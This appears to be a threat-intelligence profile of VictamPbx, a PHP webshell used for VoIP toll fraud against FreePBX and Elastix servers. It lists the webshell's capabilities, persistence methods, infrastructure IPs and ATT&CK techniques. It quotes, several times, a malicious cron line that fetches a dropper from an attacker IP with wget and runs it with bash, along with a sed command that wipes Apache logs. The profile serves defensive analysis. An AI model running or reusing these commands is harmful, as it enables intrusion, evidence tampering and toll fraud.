VictamPbx is a PHP webshell used in financially motivated VoIP toll-fraud operations targeting internet-exposed FreePBX and Elastix systems, with reporting also tying the broader activity to vulnerable Issabel and Sangoma environments. It is deployed by a Bash dropper commonly named k.php, disguised with a .php extension, which installs the webshell to numerous PBX web-accessible paths, creates missing directories as needed, timestomps files to match legitimate FreePBX timestamps, and may install a malicious .htaccess file to preserve access. The malware has been observed exploiting the FreePBX restapps REST API for initial remote code execution on unpatched systems.
VictamPbx is obfuscated with layered base64 encoding and randomized comment tokens. It authenticates operators using hardcoded MD5 password hashes and consistently uses the PHP session variable $_SESSION['looki']. Its functionality includes arbitrary command execution; theft of Elastix administrator credentials from the local SQLite acl.db database; FreePBX admin session hijacking by loading FreePBX configuration and invoking administrative objects; reading PBX and Asterisk configuration files such as /etc/elastix.conf, /etc/amportal.conf, /etc/freepbx.conf, and /etc/asterisk/freepbx.conf; and a one-click interface to originate outbound calls through the victim PBX using Asterisk channel originate commands. Default dialing values observed were country prefix 00 and dial context asterisk-outcalls, consistent with International Revenue Share Fraud (IRSF).
Associated payloads and later stages establish persistence through frequent cron jobs that repeatedly fetch k.php and secondary payloads from 45.234.176.202, and have also been observed dropping /var/www/html/admin/modules/freepbx_ha/license.php as a downloader. Additional behaviors reported in the latest variants include reconnaissance, Apache log tampering to remove restapps references, disabling the FreePBX endpoint module, creation of FreePBX and OS-level backdoor accounts including uid 0 accounts, planting SSH authorized keys, enabling root SSH login, and boot/login-triggered re-execution of the dropper.
A notable March 2026 variant included a full Stage 2 payload that systematically removed implants, accounts, cron jobs, and webshells associated with competing threat actors before installing its own persistence. Reported rival targets included Juba VoIP, Nahda, Badr/b3d0r, nvd0rz, tchTowr, and yokyok. The campaign has been linked in reporting to infrastructure centered on 45.234.176.202, 45.234.176.67, and 45.234.176.204 in AS267369 (MAFREDINE TELECOMUNICACOES EIRELI) in Salvador, Bahia, Brazil, and to branding including VictamPbx, emoadmin, emo, and Raza Telefonia. Reported operator OPSEC leaks included embedded HTML comments exposing IP addresses 85.195.233.39, 85.199.233.39, 172.56.33.182, and 162.205.106.30.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Each deploys a PHP webshell called VictamPbx for VoIP toll fraud. ... the latest variant contains a full Stage 2 payload that, before installing its own backdoors, systematically hunts and removes the implants of at least seven competing threat actors.
Each deploys a PHP webshell called VictamPbx for VoIP toll fraud. ... the latest variant contains a full Stage 2 payload that, before installing its own backdoors, systematically hunts and removes the implants of at least seven competing threat actors.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Two cron jobs re-fetch and execute the dropper every minute: */1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; bash /var/lib/asterisk/bin/zen2
Two cron jobs re-fetch and execute the dropper every minute: */1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; bash /var/lib/asterisk/bin/zen2
The FreePBX bypass loads the FreePBX configuration file... instantiates an ampuser object with the database admin credentials, calls setAdmin() to grant full privileges, and redirects to the FreePBX admin panel.
An RSA public key is planted in ~/.ssh/authorized_keys for all user home directories... The key comment is "Sangoma"
Two cron jobs re-fetch and execute the dropper every minute: */1 * * * * wget http://45.234.176.202/new/k.php -O /var/lib/asterisk/bin/zen2; bash /var/lib/asterisk/bin/zen2
Beneath the obfuscation -- triple-layered base64 encoding interleaved with randomized PHP comment tokens to break signature detection
The extension is deliberate -- it blends into FreePBX web directories full of legitimate PHP files... The key comment is "Sangoma"... centos , admin , support , issabel , and sangoma are all names a sysadmin might overlook
Before exiting, license.php runs sed -i '/restapps/d' /var/log/httpd/* to strip every Apache log line containing "restapps" from the access logs.
MITRE ATT&CK Mapping... Defense Evasion Indicator Removal: File Deletion T1070.004 Self-deleting stage scripts from /tmp
72 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
2 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
VictamPbx is a FreePBX-targeting malware kit centered on a PHP webshell used for VoIP toll fraud/IRSF. It gains execution via the FreePBX restapps REST API, deploys webshells across multiple web paths, steals credentials, enables call origination through victim PBX trunks, removes competing actors' implants, disables the endpoint module, and establishes extensive persistence through cron jobs, root-level accounts, SSH authorized_keys, and boot/login re-execution.
A purpose-built PHP webshell for FreePBX and Elastix that provides remote command execution, steals PBX admin credentials, hijacks authenticated admin sessions, reads telephony configuration and SIP credentials, and enables one-click outbound call origination for International Revenue Share Fraud (IRSF) toll fraud.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.